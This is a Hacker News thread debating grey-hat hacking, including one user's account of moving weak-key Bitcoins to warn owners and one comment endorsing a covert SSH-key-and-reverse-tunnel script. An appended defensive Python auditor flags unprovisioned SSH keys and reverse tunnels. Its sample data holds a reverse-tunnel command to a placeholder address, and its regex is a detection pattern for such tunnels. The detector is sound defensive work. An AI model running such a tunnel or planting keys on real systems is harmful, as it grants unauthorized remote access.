Hacker News
by 086421357909764 3346 days ago
What they get is irrelevant; it's someone using their skill set to make others aware of a flaw. I would argue it's the exact same premise: I'm going to phish people and cause them a financial cost to teach them to be safe.

> What they get is irrelevant

It's actually the main relevant part of the analogy.

It goes to veracity.

There's a person who gave a public talk about manipulating Bitcoins with weak private keys in order to alert the owners that they were vulnerable. But he did it in a way that verified to the owner he hadn't in fact stolen the coins (moving small portions around or maybe signing with the key, I can't remember). He also mentioned in the public talk that the owners of those Bitcoins were totally freaked out by this, and most were never convinced that he was acting in good faith (which is probably a smart assumption on their part).

So the fact that he didn't steal the coins is completely relevant; it's the very reason he could give a public talk on what is still grey-area behavior.

Your hypothetical thief, on the other hand, is clearly mendacious. You have him claiming, "If I don't capitalize on it, then people won't understand the costs/risks." That is clearly false from my real-world example above, and if he tried to give a public talk about how his theft benefited society he'd be arrested.

You're probably talking about me. I actually screwed up when I was moving coins around, and ended up emptying someone's address out, however I put everything back within a few minutes. I haven't had anyone whose coins I touched accuse me of anything unseemly, but of course there are random posters on internet forums who talk shit.

Your point that I couldn't have given a public talk had I stolen the coins is completely correct. I still spoke with a lawyer about it ahead of time, though. :-P

There was another person, who was somewhat less scrupulous, who would simply steal the coins and watch for someone to complain in public about it, then offer to return them. They use a pseudonym and as far as I can tell have vanished.

Oh, hey! Glad to hear you talked to a lawyer beforehand.
So what's gained by bricking, disabling, or modifying devices that couldn't be proven with a simple "these devices are vulnerable" announcement?
Bricked devices can't participate in a DDoS attack.
I am OK with this as well. If you put up a script on GitHub and email an org asking for help debugging, and your script drops an SSH key and then daemonizes a reverse tunnel running as that user to a VM you control, then I would blame the companies and the maintainers of ssh for allowing this to work. If their board members are unaware of the risk, then shame on any human layers that hid these capabilities or were too inept to fix it. It is their fiduciary responsibility to their investors to take security and privacy seriously to protect their investments. Companies that are cavalier in this regard need not survive.
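The scenario in the comment above (a "debugging" script that plants an SSH key and daemonizes a reverse tunnel) has a cheap, well-known detection on the target host: diff `authorized_keys` against the fingerprints you actually provisioned, and look for an ssh client process invoked with `-R`. The script below is an added example written for this page, not code from the commenter or from any project; the `authorized_keys` content, the `ps` output, the host names and the 203.0.113.5 address are all constructed sample data, and the two Ed25519 public keys are placeholder byte strings, not real keys. The fingerprint format (SHA256 of the wire-format key blob, base64 without padding) is the one OpenSSH prints with `ssh-keygen -lf`.

```python
import base64
import hashlib
import re
import struct

# Key types we expect in authorized_keys; anything else on a line is flagged as unparseable.
KEY_RE = re.compile(
    r'(?:^|\s)(ssh-ed25519|ssh-rsa|ecdsa-sha2-nistp\d+|sk-[\w@.-]+)\s+([A-Za-z0-9+/=]+)(?:\s+(.*))?$'
)
# An ssh *client* started with -R (also folded forms like -fNR or -R2222) is a reverse tunnel.
# \bssh\b deliberately does not match "sshd".
REVERSE_TUNNEL_RE = re.compile(r'\bssh\b.*\s-[A-Za-z]*R(?=\s|\d)')


def ssh_blob(key_type, raw_key):
    """Build an OpenSSH wire-format public key blob: length-prefixed type, length-prefixed key."""
    return (struct.pack(">I", len(key_type)) + key_type.encode()
            + struct.pack(">I", len(raw_key)) + raw_key)


def fingerprint(blob_b64):
    """OpenSSH SHA256 fingerprint of a base64 key blob: 'SHA256:' + base64(sha256(blob)) sans '='."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text):
    """Return one dict per key line (blank lines and comments skipped).

    Lines that do not contain a recognizable key are kept with fingerprint=None so the
    audit still surfaces them instead of silently ignoring them.
    """
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = KEY_RE.search(line)
        if m is None:
            entries.append({"line": lineno, "key_type": None, "fingerprint": None,
                            "options": line, "comment": None})
            continue
        key_type, blob_b64, comment = m.groups()
        try:
            fp = fingerprint(blob_b64)
        except ValueError:          # binascii.Error is a ValueError: corrupt base64
            fp = None
        entries.append({"line": lineno, "key_type": key_type, "fingerprint": fp,
                        "options": line[:m.start()].strip(), "comment": comment or ""})
    return entries


def find_unexpected_keys(authorized_keys_text, allowed_fingerprints):
    """Keys whose fingerprint is not in the provisioned allowlist (unparseable lines included)."""
    return [e for e in parse_authorized_keys(authorized_keys_text)
            if e["fingerprint"] not in allowed_fingerprints]


def find_reverse_tunnels(ps_text):
    """Process listing lines that look like an outbound ssh reverse tunnel."""
    return [line.strip() for line in ps_text.splitlines() if REVERSE_TUNNEL_RE.search(line)]


# --- constructed sample data (placeholder keys, not real ones) ---------------------------
ALLOWED_BLOB = base64.b64encode(ssh_blob("ssh-ed25519", b"\x01" * 32)).decode()
DROPPED_BLOB = base64.b64encode(ssh_blob("ssh-ed25519", b"\x02" * 32)).decode()

SAMPLE_AUTHORIZED_KEYS = f"""# managed by config management (constructed sample)
command="/usr/bin/rsync --server",no-pty ssh-ed25519 {ALLOWED_BLOB} backup@bastion
ssh-ed25519 {DROPPED_BLOB} debug-helper
"""

# Only the key we provisioned ourselves is on the allowlist.
ALLOWED_FINGERPRINTS = {fingerprint(ALLOWED_BLOB)}

SAMPLE_PS = """\
  PID USER     COMMAND
  812 root     /usr/sbin/sshd -D
 2231 deploy   ssh -fN -R 2222:localhost:22 ops@203.0.113.5
 2250 deploy   python3 debug_helper.py
 2301 deploy   ssh -L 8080:localhost:80 ops@203.0.113.5
"""


def audit(authorized_keys_text=SAMPLE_AUTHORIZED_KEYS, ps_text=SAMPLE_PS,
          allowed_fingerprints=ALLOWED_FINGERPRINTS):
    """Run both checks and return the findings."""
    return {"unexpected_keys": find_unexpected_keys(authorized_keys_text, allowed_fingerprints),
            "reverse_tunnels": find_reverse_tunnels(ps_text)}


if __name__ == "__main__":
    findings = audit()
    for e in findings["unexpected_keys"]:
        print(f"authorized_keys line {e['line']}: unexpected key {e['fingerprint']} ({e['comment']})")
    for cmd in findings["reverse_tunnels"]:
        print(f"reverse tunnel: {cmd}")
```

On a real host you would feed it the contents of every user's `~/.ssh/authorized_keys` (plus any `AuthorizedKeysFile` paths from `sshd_config`) and the output of `ps -eo pid,user,args`; the allowlist is whatever your config management says it deployed. The `-L` forward in the sample is deliberately not flagged: only `-R` exposes the host to the remote side.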